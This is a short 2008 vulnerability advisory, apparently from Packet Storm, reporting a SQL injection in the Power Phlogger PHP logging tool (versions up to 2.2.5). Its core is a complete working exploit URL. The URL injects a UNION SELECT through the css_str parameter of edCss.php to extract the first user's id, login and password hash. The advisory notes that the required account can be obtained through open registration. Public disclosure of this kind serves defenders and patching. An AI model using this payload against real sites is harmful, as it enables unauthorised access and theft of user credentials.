powerphlogger-sql.txt

2008-06-05T00:00:00
ID PACKETSTORM:67022
Type packetstorm
Reporter MustLive
Modified 2008-06-05T00:00:00

Description

                                        
                                            `############################################################  
  
SQL Injection vulnerability in Power Phlogger  
  
By MustLive (http://websecurity.com.ua)  
  
Detailed information: http://websecurity.com.ua/2158/  
  
Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.  
  
SQL Injection:  
  
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit  
  
With this query you will receive id, login and password (hash) of first user.  
  
Vulnerable versions are Power Phlogger <= 2.2.5.  
  
############################################################  
  
`